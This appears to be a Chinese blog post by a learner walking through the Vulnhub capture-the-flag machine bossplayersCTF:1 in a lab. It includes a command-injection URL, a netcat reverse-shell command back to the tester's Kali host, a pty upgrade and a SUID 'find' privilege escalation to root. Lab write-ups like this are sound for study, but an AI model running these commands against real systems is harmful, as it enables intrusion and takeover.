打靶分享-BOSSPLAYERSCTF1

Vulnhub靶机下载网址:
bossplayersCTF: 1
靶机安装后一直探测不到IP
需要修改网卡配置文件,网卡配置文件中网卡名称和虚拟机网卡名字不一致所以一直获取不到IP

信息收集

进行敏感目录扫描发现了http://10.4.7.132/robots.txt
image.png
bG9sIHRyeSBoYXJkZXIgYnJvCg==
image.png
哈哈再努力一点兄弟
没有用,继续寻找有用信息

网页查看

image.png

网页源代码信息

image.png
WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK
三次base64解码出现了workinginprogress.php(讲真的这个三次解码不看教程我是想不到的)
image.png
image.png
尝试访问一下
image.png
发现了一个好像有用的地方
image.png

漏洞发现

这个页面可能存在命令执行漏洞
image.png
查看靶机有无nc http://10.4.7.132/workinginprogress.php?cmd=ls%20/usr/bin|grep%20nc
image.png
着开启本机kali 开启监听端口6666 执行:10.4.7.132/workinginprogress.php?cmd=nc 10.4.7.130 6666 /bin/bash
image.png

反弹shell

反弹成功后
使用python开启交互:python -c "import pty;pty.spawn('/bin/bash')"
image.png

SUID提权

使用命令:find / -perm -u=s -type f 2>/dev/null 查找具有suid权限的文件,发现可以通过find提权,获得权限
image.png
使用命令 find . -exec /bin/bash -p ;
-p : 让 euid 为0 , 权限为root 权限
默认情况下 bash 在执行时,如果发现 euid 和 uid 不匹配,会将 euid(即 suid) 强制重置为uid 。如果使用了 -p 参数,则不会再覆盖。
image.png
拿到root权限
开始找flag,发现了一个base64编码的内容
image.png
解码一下获取了congratulations 祝福
image.png

总结:

获取到80端口页面源代码的base64编码之后,根本想不到需要解码三次,需要看教程
解码三次后获取到的界面存在命令执行漏洞也是想不到,只有ping测试给我一种可以下手的感觉,不看教程还是找不到执行点
find提权的使用的时候需要查资料,但是基本语法和提权原理因为老师讲过还算是了解
总体来说,还是缺点很多的,没有教程寸步难行,在渗透这一方面还有很远的路要走,感觉自己连入门都算不上。

参考教程
看完这篇 教你玩转渗透测试靶机vulnhub——BOSSPLAYERSCTF1-阿里云开发者社区
find提权
find 命令提权 - 编程猎人

posted @ 2024-01-30 17:34  sev1n  阅读(292)  评论(0)    收藏  举报